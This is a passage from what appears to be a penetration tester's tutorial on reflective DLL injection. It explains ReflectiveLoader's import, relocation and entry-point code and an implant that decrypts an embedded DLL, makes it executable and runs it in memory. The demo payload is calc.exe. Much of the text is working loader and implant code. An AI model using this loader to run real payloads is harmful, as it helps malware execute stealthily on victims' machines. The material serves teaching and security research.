        // uiValueD = VA of the OriginalFirstThunk
        uiValueD = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk);
        // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
        uiValueA = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk);
        // itterate through all imported functions, importing by ordinal if no name present
        while (DEREF(uiValueA))


After entering the loop, we load the desired module into memory using the pointer to LoadLibraryA we obtained earlier and save the address it's loaded at into uiLibraryAddress. We then obtain the address of the "OriginalFirstThunk" and store it in uiValueD. uiValueD now holds the location in memory of an array of "Thunks", one for each imported function. The easiest way to think of Thunks is as RVAs that can be used to call the functions. We then obtain the address of the import address table through "FirstThunk" and store it in uiValueA; this is the array that gets patched with the resolved function addresses.


The PEBear screenshot above shows the first entry of the import directory, Kernel32.dll. The OriginalFirstThunk RVA holds all the Thunk RVAs. The FirstThunk points to the address of the "OriginalThunk" of the CreateThread function. On a 64-bit image, every 8 bytes will contain an "OriginalThunk" that is associated with one function. To enter the loop, we dereference the value of uiValueA, which contains the FirstThunk entry for CreateThread. If this value is NULL, we exit the loop.

            // sanity check uiValueD as some compilers only import by FirstThunk
            if (uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG)
            {
                // get the VA of the modules NT Header
                uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
                // uiNameArray = the address of the modules export directory entry
                uiNameArray = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
                // get the VA of the export directory
                uiExportDir = (uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress);
                // get the VA for the array of addresses
                uiAddressArray = (uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions);
                // use the import ordinal (- export ordinal base) as an index into the array of addresses
                uiAddressArray += ((IMAGE_ORDINAL(((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal) - ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->Base) * sizeof(DWORD));
                // patch in the address for this imported function
                DEREF(uiValueA) = (uiLibraryAddress + DEREF_32(uiAddressArray));
            }
            else
            {
                // get the VA of this functions import by name struct
                uiValueB = (uiBaseAddress + DEREF(uiValueA));
                // use GetProcAddress and patch in the address for this imported function
                DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress((HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name);
            }
            // get the next imported function
            uiValueA += sizeof(ULONG_PTR);
            if (uiValueD)
                uiValueD += sizeof(ULONG_PTR);
        }
        // get the next import
        uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR);
    }


First, we check whether uiValueD is valid and whether the IMAGE_ORDINAL_FLAG is set in the Thunk for the function we are trying to import. If it is set, we must import the function by ordinal rather than by name. Luckily for us, we will not enter this execution block because our DLL does not import any functions by ordinal. Because of this, I will not explain the execution of that block. However, I encourage you to check it out yourself.
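To make the ordinal check concrete, here is a minimal, portable sketch of how a single 64-bit Thunk value can be interpreted. The names kOrdinalFlag64, ThunkInfo, and DecodeThunk64 are hypothetical and only used for illustration; winnt.h provides the equivalent IMAGE_ORDINAL_FLAG64 and IMAGE_ORDINAL64 macros. It assumes a 64-bit PE, where the top bit marks an import by ordinal.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical constant mirroring IMAGE_ORDINAL_FLAG64 from winnt.h.
constexpr std::uint64_t kOrdinalFlag64 = 0x8000000000000000ULL;

// Hypothetical result type for this illustration.
struct ThunkInfo {
    bool byOrdinal;       // true: import by ordinal, false: import by name
    std::uint32_t value;  // the ordinal, or the RVA of the hint/name structure
};

// Interpret one 64-bit Thunk as it appears before the loader patches it.
inline ThunkInfo DecodeThunk64(std::uint64_t thunk) {
    if (thunk & kOrdinalFlag64) {
        // Import by ordinal: the low 16 bits hold the ordinal number.
        return {true, static_cast<std::uint32_t>(thunk & 0xFFFF)};
    }
    // Import by name: the low 31 bits hold the RVA of IMAGE_IMPORT_BY_NAME.
    return {false, static_cast<std::uint32_t>(thunk & 0x7FFFFFFF)};
}
```

Feeding it the value 0x0000000000003BA8 from our CreateThread entry reports an import by name with an RVA of 0x3BA8, which is why the loader takes the else branch.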

Since we are not entering the import-by-ordinal block, we enter the else block. If you recall, uiValueA points to the current entry in the "FirstThunk" array. Before patching, that entry holds the "OriginalThunk" value, which is the RVA of the IMAGE_IMPORT_BY_NAME structure containing the name of the function we are trying to import. Adding that RVA to the base address of our allocated memory gives us a pointer to the structure, which we store in uiValueB. We then pass the name, together with the module handle in uiLibraryAddress, to our GetProcAddress pointer to obtain the address of the desired function, which is written back into the "FirstThunk" entry that uiValueA points to. Then, when we call that function, instead of using 0x0000000000003BA8, we'll use whatever was returned by GetProcAddress. This means the first address has been successfully patched!


The process of finding the OriginalThunk (Function Name) of the imported function, and then patching the value pointed to by the "Call Via" column, is repeated until all imported functions are patched for that library module. Then the process is repeated for the next library module.

When all the function imports have been patched, we move on to processing the image's relocation table. As a side note, the code contains an if statement that applies only when the architecture is ARM. I will skip over this code because I am on an Intel machine.

    // STEP 5: process all of our images relocations...
    // calculate the base address delta and perform relocations (even if we load at desired image base)
    uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
    // uiValueB = the address of the relocation directory
    uiValueB = (ULONG_PTR) & ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
    // check if there are any relocations present
    if (((PIMAGE_DATA_DIRECTORY)uiValueB)->Size)
    {
        // uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
        uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress);
        // and we iterate through all entries...
        while (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock)
        {
            // uiValueA = the VA for this relocation block
            uiValueA = (uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress);
            // uiValueB = number of entries in this relocation block
            uiValueB = (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC);
            // uiValueD is now the first entry in the current relocation block
            uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
            // we iterate through all the entries in the current block...
            while (uiValueB--)
            {
                // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
                // we dont use a switch statement to avoid the compiler building a jump table
                // which would not be very position independent!
                if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64)
                    *(ULONG_PTR*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
                else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW)
                    *(DWORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
                else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH)
                    *(WORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
                else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW)
                    *(WORD*)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
                // get the next entry in the current relocation block
                uiValueD += sizeof(IMAGE_RELOC);
            }
            // get the next entry in the relocation directory
            uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
        }
    }


The first operation we perform is obtaining the delta (difference) between the starting address of our allocated memory and the image base address that is listed in the Optional Header. As an example, you can picture it like this: Image Base Listed = 0x180000000 | Address of Allocated Memory Region = 0x26D35A40000 | the Delta would be 0x26BB5A40000. This delta value is saved in the uiLibraryAddress variable. Then we obtain a pointer to the relocation table entry in the data directory and save it in uiValueB. We follow that up with a quick sanity check to ensure that the relocation table has a non-zero size. If the size is zero, the table is empty and there is nothing to relocate. Next, we set our uiValueC variable to the address of the first block in the base relocation table. Once uiValueC points to the table's data, we enter our while loop, which continues as long as the current block's SizeOfBlock field (28 for our first block) is non-zero. Inside the loop, we set uiValueA to the block's virtual address plus our base address. This gives us the address of the page that the relocation entries in the screenshot below apply to.


Once we have that address, we calculate how many entries the block contains and store the result in uiValueB: we subtract the size of the block header from SizeOfBlock and divide by the size of one entry. Where do these sizes come from? If we look at the WinNT.h file and search for the IMAGE_BASE_RELOCATION structure, we see that both of its fields are DWORDs, or 4 bytes each, so the header is 8 bytes. Then we look for IMAGE_RELOC in our ReflectiveLoader.h file and see a 12-bit offset and a 4-bit type packed into a single WORD, so each entry is 2 bytes. Reading the 28 in the screenshot as hexadecimal (0x28, or 40 bytes), this gives (40 - 8) / 2 = 16 entries. If you look at the Relocation Block, the values are each two bytes long and the last two are padding that is not needed, therefore you have 14 real entries.

Next, we advance our pointer to the relocation block by 8 bytes and store the result in uiValueD. The reason is that the first 8 bytes store the block's RVA and the block size value, so uiValueD now points to the first entry. The entry count in uiValueB then drives our inner while loop. Once in the while loop, we check the relocation entry's type to see how wide the value to patch is: IMAGE_REL_BASED_DIR64 is a 64-bit address, as used on x64, and IMAGE_REL_BASED_HIGHLOW is a 32-bit address, as used on x86. Once the type has been determined, we take uiValueA and add the entry's offset to it, which gives us the address of the value that needs patching. Next, we add the delta saved in uiLibraryAddress to the value stored there. This successfully performs a relocation address patch. Since the address stored at the relocation target assumes an image base of 0x180000000, and our allocated memory is at 0x26D35A40000, we need to add the delta 0x26BB5A40000 to the stored value so that it points into our allocated memory region.
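The block arithmetic can be sketched in a few lines of portable C++. This is only an illustration under stated assumptions: the helper names RelocEntryCount, RelocEntry, and DecodeRelocEntry are hypothetical, the sizes (8-byte header, 2-byte entry) are the ones discussed for IMAGE_BASE_RELOCATION and IMAGE_RELOC, and the raw entry value used in the usage note is made up.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Sizes of the two structures discussed in the text.
constexpr std::size_t kBlockHeaderSize = 8;  // IMAGE_BASE_RELOCATION: two DWORDs
constexpr std::size_t kEntrySize = 2;        // IMAGE_RELOC: one WORD

// Number of 2-byte entries that follow the 8-byte block header.
inline std::size_t RelocEntryCount(std::uint32_t sizeOfBlock) {
    assert(sizeOfBlock >= kBlockHeaderSize);
    return (sizeOfBlock - kBlockHeaderSize) / kEntrySize;
}

// Hypothetical unpacked view of one relocation entry.
struct RelocEntry {
    std::uint16_t type;    // high 4 bits, e.g. 10 = IMAGE_REL_BASED_DIR64
    std::uint16_t offset;  // low 12 bits, offset within the block's page
};

// Split a raw 16-bit entry into its type and offset fields.
inline RelocEntry DecodeRelocEntry(std::uint16_t raw) {
    return {static_cast<std::uint16_t>(raw >> 12),
            static_cast<std::uint16_t>(raw & 0x0FFF)};
}
```

For a block whose SizeOfBlock is 0x28, RelocEntryCount yields 16. A made-up raw entry of 0xA1C0 decodes to type 10 (IMAGE_REL_BASED_DIR64) with an offset of 0x1C0, while a padding entry of 0x0000 decodes to type 0 (IMAGE_REL_BASED_ABSOLUTE), which the loader skips.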


That means we take the value stored at the first entry's target, 0x00000001800021C0, add the delta 0x26BB5A40000, and receive the patched value 0x26D35A421C0. If you look at our library's allocated memory address, 0x26D35A40000, the patched address is located 0x21C0 bytes after it! After the patching is completed, we advance to the next relocation entry. We keep decrementing our counter until we break out of the inner while loop. Finally, we advance to the next block, if it exists, and restart the process for that block. However, our malicious DLL only has one block, so we exit.
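The arithmetic above can be checked with a small, portable sketch. The function names ComputeDelta and ApplyDir64 are hypothetical, and the buffer stands in for the mapped image; this is not the loader's code, just the same addition performed on plain memory.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Delta between where the image actually sits and its preferred ImageBase.
// Unsigned wrap-around is fine here: adding the delta back undoes it.
inline std::uint64_t ComputeDelta(std::uint64_t loadedBase, std::uint64_t preferredBase) {
    return loadedBase - preferredBase;
}

// Apply a DIR64-style fixup: add the delta to the 64-bit value stored
// at `offset` bytes into `image`. memcpy avoids unaligned access issues.
inline void ApplyDir64(std::uint8_t* image, std::size_t offset, std::uint64_t delta) {
    std::uint64_t value = 0;
    std::memcpy(&value, image + offset, sizeof(value));
    value += delta;
    std::memcpy(image + offset, &value, sizeof(value));
}
```

With a loaded base of 0x26D35A40000 and a preferred base of 0x180000000, ComputeDelta returns 0x26BB5A40000, and applying it to a stored value of 0x1800021C0 produces 0x26D35A421C0, matching the numbers in the walkthrough.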

Finally, after all our hard work, we can obtain the address that needs to be returned to the executing program. This process is simple and looks like the following:

    // STEP 6: call our images entry point
    // uiValueA = the VA of our newly loaded DLL/EXE's entry point
    uiValueA = (uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint);
    // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
    pNtFlushInstructionCache((HANDLE)-1, NULL, 0);
    // call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
    // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
    ((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter);
#else
    // if we are injecting an DLL via a stub we call DllMain with no parameter
    ((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL);
#endif
    // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
    return uiValueA;
}


We find the entry point of the DLL by reading the Optional Header's AddressOfEntryPoint RVA, adding our allocated memory region's base address, and storing the result in uiValueA. The pNtFlushInstructionCache function pointer we resolved at the beginning of ReflectiveLoader does exactly what it sounds like and flushes the instruction cache. Next, we cast our entry point address to the DLLMAIN type and call it with three arguments: the first is the base address of the memory region, the second is the reason for the call, which in our case is DLL_PROCESS_ATTACH, and the third is whatever parameter we want to pass to DllMain, much like an argument "from the command line". That third argument is only populated when the DLL is injected via LoadRemoteLibraryR; otherwise it is NULL. If you're unsure of what this looks like, please reference the following screenshot:


This value is then returned to the calling program.

This brings us to our implant, which stores our DLL in an encrypted format on disk, decrypts it, allocates memory for the decrypted version (which keeps the same layout as the file on disk), finds the address of the exported ReflectiveLoader function, and calls it. Once ReflectiveLoader is called, it allocates a second memory region in the current process that is the size of the image in memory (taken from the Optional Header), performs all the loading and patching we stepped through earlier, calls DllMain, and then returns the address of the entry point. To start all of this, all our implant must do is call CreateThread on the address of ReflectiveLoader. So, what does this look like?

We'll start by explaining the easiest function, the main block:

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    void* exec_mem;
    BOOL rv;
    HANDLE th;
    DWORD oldprotect = 0;
    DWORD RefLdrOffset = 0;
    unsigned int payload_len = sizeof(payload);
    // Allocate memory for payload
    exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    // Decrypt payload
    AESDecrypt((char*)payload, payload_len, (char*)key, sizeof(key));
    // Copy payload to allocated buffer
    RtlMoveMemory(exec_mem, payload, payload_len);
    // Make the buffer executable
    rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
    RefLdrOffset = GetReflectiveLoaderOffset(payload);
    // If all good, launch the payload
    if (rv != 0) {
        th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)((ULONG_PTR)exec_mem + RefLdrOffset), 0, 0, 0);
        Sleep(5000); // give ReflectiveLoader time to perform the parsing and loading the DLL into memory.
        WaitForSingleObject(th, INFINITE);
    }
}


First, we allocate memory in our current process for the size of the payload we have stored in our code. Next, we decrypt the payload and copy it into our allocated memory region. Following that, we change the memory region's protection to PAGE_EXECUTE_READ so it can be executed. Finally, we call our GetReflectiveLoaderOffset function and give it the decrypted payload as a parameter. This function should seem vaguely familiar, as all we are doing at its core is parsing the headers of the library, finding the export address table, and then finding the offset of our ReflectiveLoader function.

DWORD GetReflectiveLoaderOffset(VOID* lpReflectiveDllBuffer)
{
    UINT_PTR uiBaseAddress = 0;
    UINT_PTR uiExportDir = 0;
    UINT_PTR uiNameArray = 0;
    UINT_PTR uiAddressArray = 0;
    UINT_PTR uiNameOrdinals = 0;
    DWORD dwCounter = 0;
#ifdef WIN_X64
    DWORD dwCompiledArch = 2;
#else
    // This will catch Win32 and WinRT.
    DWORD dwCompiledArch = 1;
#endif
    uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
    // get the File Offset of the modules NT Header
    uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
    // currently we can only process a PE file which is the same type as the one this function has
    // been compiled as, due to various offsets in the PE structures being defined at compile time.
    if (((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B) // PE32
    {
        if (dwCompiledArch != 1)
            return 0;
    }
    else if (((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B) // PE64
    {
        if (dwCompiledArch != 2)
            return 0;
    }
    else
    {
        return 0;
    }
    // uiNameArray = the address of the modules export directory entry
    uiNameArray = (UINT_PTR) & ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    // get the File Offset of the export directory
    uiExportDir = uiBaseAddress + Rva2Offset(((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress);
    // get the File Offset for the array of name pointers
    uiNameArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames, uiBaseAddress);
    // get the File Offset for the array of addresses
    uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
    // get the File Offset for the array of name ordinals
    uiNameOrdinals = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals, uiBaseAddress);
    // get a counter for the number of exported functions...
    dwCounter = ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->NumberOfNames;
    // loop through all the exported functions to find the ReflectiveLoader
    while (dwCounter--)
    {
        char* cpExportedFunctionName = (char*)(uiBaseAddress + Rva2Offset(DEREF_32(uiNameArray), uiBaseAddress));
        if (strstr(cpExportedFunctionName, REFLDR_NAME) != NULL)
        {
            // get the File Offset for the array of addresses
            uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
            // use the functions name ordinal as an index into the array of addresses
            uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD));
            // return the File Offset to the ReflectiveLoader() functions code...
            return Rva2Offset(DEREF_32(uiAddressArray), uiBaseAddress);
        }
        // get the next exported function name
        uiNameArray += sizeof(DWORD);
        // get the next exported function name ordinal
        uiNameOrdinals += sizeof(WORD);
    }
    return 0;
}


We start by initializing some variables and then assigning the base address of our payload buffer to the uiBaseAddress variable. Next, we find the NT Headers by adding the offset stored in the e_lfanew field. Then we do a sanity check to confirm that the DLL's architecture (32 or 64 bit) matches the one our implant was compiled for. Then we move into the good stuff. The first item is to set the uiNameArray variable equal to the address of the Export Directory entry in the Data Directory table. Next, we take the export directory entry's virtual address and the base address of the payload and pass them to the Rva2Offset function. To explain that function simply, it takes the virtual address given, finds which section the address resides in, subtracts the virtual address of that section, and adds the raw data pointer of that section. This means if the virtual address passed is within the .text section of our DLL, we would take the virtual address, subtract 0x1000, and add 0x400, which is the same as subtracting 0xC00. This gives us the offset of the data we're looking for as it is on disk (since we have not loaded this DLL into memory correctly like we would using ReflectiveLoader). Then we add that offset to the base address of our payload to find the value that we store in uiExportDir. We repeat this process for the export directory's arrays of names, addresses, and ordinals. Luckily, our DLL only exports one function, which is ReflectiveLoader.
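The RVA-to-file-offset conversion is easier to follow as code. The sketch below is a portable illustration of the idea, not the Rva2Offset function from the project: the Section struct is a hypothetical, trimmed-down stand-in for IMAGE_SECTION_HEADER, and RvaToFileOffset takes a list of sections instead of parsing them out of the PE headers.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical, trimmed-down stand-in for IMAGE_SECTION_HEADER.
struct Section {
    std::uint32_t virtualAddress;    // RVA where the section is mapped in memory
    std::uint32_t sizeOfRawData;     // number of bytes the section occupies on disk
    std::uint32_t pointerToRawData;  // file offset where the section's bytes start
};

// Convert an RVA to an offset into the raw file. Returns 0 if no section contains it.
inline std::uint32_t RvaToFileOffset(std::uint32_t rva, const std::vector<Section>& sections) {
    // RVAs that fall inside the headers are the same on disk and in memory.
    if (!sections.empty() && rva < sections.front().pointerToRawData) {
        return rva;
    }
    for (const Section& s : sections) {
        if (rva >= s.virtualAddress && rva < s.virtualAddress + s.sizeOfRawData) {
            // Offset within the section, rebased onto the section's position on disk.
            return rva - s.virtualAddress + s.pointerToRawData;
        }
    }
    return 0;
}
```

Using the .text values from the walkthrough (virtual address 0x1000, raw data pointer 0x400) and an assumed raw size of 0x1200, an RVA of 0x1234 maps to file offset 0x634, which is 0xC00 less than the RVA.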

Here are the section headers in case you'd like a reference to how we got our numbers.


Then we initialize a counter variable that is equal to the number of names, which in this case is one. Following that, we obtain a pointer to the name of the first function exported by the DLL by again finding the offset to the data as it is on disk, adding the base address of our payload to it, casting it to a character pointer, and saving it as cpExportedFunctionName. We then use the strstr function to check whether the name contains our REFLDR_NAME definition. If it doesn’t, we move to the next name and the next name ordinal. However, if it matches, we obtain a pointer to the array of addresses. Then we multiply the name ordinal by 4, the size of a DWORD, to index into that array and find the entry holding the desired function's virtual address. Finally, we convert that virtual address to a file offset with Rva2Offset and return it.
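The relationship between the three export arrays is the part that trips most people up, so here is a small portable model of it. Everything in this sketch is hypothetical scaffolding: ExportTable holds already-resolved copies of the names, name ordinals, and function RVAs, and FindExportRva is an illustrative helper rather than code from the project.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical in-memory model of the three parallel export arrays.
struct ExportTable {
    std::vector<const char*> names;           // AddressOfNames, resolved to strings
    std::vector<std::uint16_t> nameOrdinals;  // AddressOfNameOrdinals
    std::vector<std::uint32_t> functions;     // AddressOfFunctions (RVAs)
};

// Return the RVA of the first export whose name contains `needle`, or 0 if none does.
inline std::uint32_t FindExportRva(const ExportTable& table, const char* needle) {
    for (std::size_t i = 0; i < table.names.size(); ++i) {
        if (std::strstr(table.names[i], needle) != nullptr) {
            // names[i] and nameOrdinals[i] are paired; the ordinal is the
            // index into the function address array.
            std::uint16_t index = table.nameOrdinals[i];
            return table.functions[index];
        }
    }
    return 0;
}
```

The key point is that the position of a name in the name array is not the position of its address in the address array; the name ordinal at the same position supplies that index. The loader then still has to convert the returned RVA to a file offset, because the DLL has not been mapped yet.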


Back in WinMain, our offset value is now saved in RefLdrOffset.

    RefLdrOffset = GetReflectiveLoaderOffset(payload);
    // If all good, launch the payload
    if (rv != 0) {
        th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)((ULONG_PTR)exec_mem + RefLdrOffset), 0, 0, 0);
        Sleep(5000); // give ReflectiveLoader time to perform the parsing and loading the DLL into memory.
        WaitForSingleObject(th, INFINITE);
    }


To finish up our program, all we need to do is call CreateThread with our allocated memory's base address plus the loader offset as the start address. We sleep for a few seconds to give the ReflectiveLoader function time to do its job and then call WaitForSingleObject, which blocks our program until the thread running our payload finishes executing or the process is shut down.

To recap, our execution flow looks like the following:

Implant with our encrypted DLL -> allocates memory for the DLL -> put the decrypted DLL into that memory space -> find the offset of the exported ReflectiveLoader function in the DLL -> call the ReflectiveLoader function -> ReflectiveLoader searches backward for the start of the DLL in memory -> allocates a new memory region that is the size of the DLL Image in memory (which is larger than on disk) -> perform loading and patching operations -> call DllMain of the DLL now that it's been loaded -> DllMain calls our Go function -> go function decrypts our calc.exe payload and executes it!

Compiling and Preparing the Implant

To compile our implant, we first need to compile our DLL. The Visual Studio solution I have put on GitHub has all the code ready for compilation. Once you have compiled everything, we need to encrypt our DLL using the aes.py Python script. This script will output the DLL in an encrypted format along with the key used to decrypt the DLL. Usage looks just like the following:


When we put our DLL in our program, it will look like the following. We just need to ensure it's a variable initialized outside of main.


When we execute our ReflectiveLoader program it works just as planned!


All code was developed by the Sektor7 Institute team and Stephen Fewer. If you have any questions or would like to check out more of my work you can follow me here on Twitter or on LinkedIn. If you're interested in hiring Depth Security for our Penetration Testing services, please visit our contact page or email sales@depthsecurity.com.
